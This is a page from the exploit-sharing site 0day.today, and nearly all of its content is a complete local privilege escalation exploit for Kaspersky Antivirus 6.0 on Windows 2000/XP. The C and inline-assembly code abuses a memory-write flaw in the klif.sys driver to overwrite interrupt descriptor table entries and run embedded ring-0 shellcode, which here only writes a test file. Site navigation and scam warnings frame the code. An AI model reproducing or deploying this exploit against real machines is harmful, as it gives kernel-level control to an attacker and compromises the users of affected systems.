0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Kaspersky Antivirus 6.0 Local Privilege Escalation Exploit
========================================================== Kaspersky Antivirus 6.0 Local Privilege Escalation Exploit ========================================================== // kav 6.0 0day local priv escalation exploit // by m4d // http://unl0ck.net #include <windows.h> #include <stdlib.h> #include <stdio.h> // r0-shellcode creates C:\Hello.txt with "Hello from ring-0! :)" unsigned char Shellcode[405] = { 0x55, 0x8B, 0xEC, 0x83, 0xC4, 0xBC, 0x60, 0x83, 0x4D, 0xE8, 0xFF, 0x0F, 0x01, 0x4D, 0xFA, 0x8B, 0x4D, 0xFC, 0x81, 0xC1, 0x50, 0x01, 0x00, 0x00, 0x66, 0x8B, 0x71, 0x06, 0xC1, 0xE6, 0x10, 0x66, 0x8B, 0x31, 0x4E, 0x66, 0x81, 0x3E, 0x4D, 0x5A, 0x75, 0xF8, 0x8B, 0x46, 0x3C, 0xA9, 0x00, 0xFF, 0xFF, 0xFF, 0x75, 0xEE, 0x81, 0x3C, 0x30, 0x50, 0x45, 0x00, 0x00, 0x75, 0xE5, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x58, 0x8D, 0x90, 0xB7, 0x00, 0x00, 0x00, 0x8D, 0x5A, 0x58, 0x8B, 0xC6, 0x6A, 0x0D, 0x59, 0xFF, 0xD3, 0x89, 0x45, 0xEC, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x08, 0x59, 0xFF, 0xD3, 0x89, 0x45, 0xF0, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x0C, 0x59, 0xFF, 0xD3, 0x89, 0x45, 0xF4, 0x03, 0xD1, 0x89, 0x55, 0xE4, 0x6A, 0x20, 0x58, 0x66, 0x89, 0x45, 0xE0, 0x66, 0x89, 0x45, 0xE2, 0x8D, 0x4D, 0xC0, 0xC7, 0x01, 0x18, 0x00, 0x00, 0x00, 0x83, 0x61, 0x04, 0x00, 0xC7, 0x41, 0x0C, 0x00, 0x02, 0x00, 0x00, 0x83, 0x61, 0x10, 0x00, 0x8D, 0x45, 0xE0, 0x89, 0x41, 0x08, 0x83, 0x61, 0x14, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x20, 0x6A, 0x03, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x8D, 0x45, 0xD8, 0x50, 0x8D, 0x45, 0xC0, 0x50, 0x68, 0x04, 0x00, 0x10, 0x00, 0x8D, 0x45, 0xBC, 0x50, 0xFF, 0x55, 0xEC, 0x85, 0xC0, 0x75, 0x2D, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x17, 0x8B, 0x45, 0xE4, 0x0F, 0xB7, 0x4D, 0xE0, 0x03, 0xC1, 0x50, 0x8D, 0x45, 0xD8, 0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF4, 0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF0, 0xC7, 0x45, 0xE8, 0xEF, 0xBE, 0xAD, 0xDE, 0x61, 0x8B, 0x45, 0xE8, 0xC9, 0xCF, 0x5A, 0x77, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5A, 0x77, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x00, 0x5A, 0x77, 0x57, 0x72, 0x69, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5C, 0x00, 0x3F, 0x00, 0x3F, 0x00, 0x5C, 0x00, 0x43, 0x00, 0x3A, 0x00, 0x5C, 0x00, 0x48, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x6C, 0x00, 0x6F, 0x00, 0x2E, 0x00, 0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20, 0x72, 0x69, 0x6E, 0x67, 0x2D, 0x30, 0x21, 0x20, 0x3A, 0x29, 0x0D, 0x0A, 0x60, 0x8B, 0x50, 0x3C, 0x8B, 0x54, 0x10, 0x78, 0x03, 0xD0, 0x8B, 0x5A, 0x20, 0x03, 0xD8, 0x33, 0xED, 0x8B, 0x4A, 0x18, 0x51, 0x8B, 0x4C, 0x24, 0x1C, 0x8B, 0x33, 0x03, 0xF0, 0x8B, 0x7C, 0x24, 0x18, 0xF3, 0xA6, 0x59, 0x74, 0x06, 0x45, 0x83, 0xC3, 0x04, 0xE2, 0xE8, 0x8B, 0x4A, 0x24, 0x03, 0xC8, 0x0F, 0xB7, 0x0C, 0x69, 0x8B, 0x6A, 0x1C, 0x03, 0xE8, 0x95, 0x03, 0x2C, 0x88, 0x89, 0x6C, 0x24, 0x1C, 0x61, 0xC3 }; typedef struct _FIRST_PARAM { ULONG SwitchIndex; ULONG Unknown; // 0xFF0002...0xFF000F, if this parameters won't be in the list of klif.sys, sploit won't work.. ULONG Value; // this value will rewrite DWORD of memory } FIRST_PARAM, *PFIRST_PARAM; void main(int argc, char* argv[]) { __try { FIRST_PARAM Param1; ULONG Param2; // pointer to write DATA - 8 CHAR Idtr[6]; CHAR IsKAVInstalled; OSVERSIONINFOEX os; os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); GetVersionEx((LPOSVERSIONINFO)&os); if (os.dwPlatformId != VER_PLATFORM_WIN32_NT || os.dwMajorVersion != 5 || os.dwMinorVersion > 1) { printf("This OS version unsupported\n"); return; } // ??? ?????? ?????????, ?????????? ?? KAV ??? ??? __asm { cmp os.dwMinorVersion, 0 jnz short $+13 mov eax, 0F8h // 2k jmp short $+7 mov eax, 11Ch // xp int 2Eh cmp eax, 0Ch setz al mov IsKAVInstalled, al } if (!IsKAVInstalled) { printf("KAV6 didn't installed\n"); return; } Param1.SwitchIndex = 3; // Index of jmp in case of switch() Param1.Unknown = 0xFF0002; __asm { pusha sidt Idtr mov eax, dword ptr [Idtr+2] add eax, 0DAh * 8 - 8 mov Param2, eax // Write lower DWORD IdtEntry mov ecx, offset Shellcode and ecx, 0000FFFFh or ecx, 00080000h mov Param1.Value, ecx // Set DWORD: [selector 0x0008 | LOWORD(Shellcode)] push Param2 lea eax, Param1 push eax mov edx, esp cmp os.dwMinorVersion, 0 jnz short $+13 mov eax, 100h // 2k jmp short $+7 mov eax, 124h // xp int 2Eh add esp, 2*4 // Write high DWORD IdtEntry add Param2, 4 mov ecx, offset Shellcode and ecx, 0FFFF0000h or ecx, 0000EE00h mov Param1.Value, ecx // Set DWORD: [HIWORD(Shellcode) | gate parameters 0xEE00] push Param2 lea eax, Param1 push eax mov edx, esp cmp os.dwMinorVersion, 0 jnz short $+13 mov eax, 100h // 2k jmp short $+7 mov eax, 124h // xp int 2Eh add esp, 2*4 // Call Gate :-) (COLGATE) push fs int 0DAh pop fs popa } printf("Exploited successful\n"); } __except(1) { printf("Can't create interrupt gate\n"); } } # 0day.today [2024-12-24] #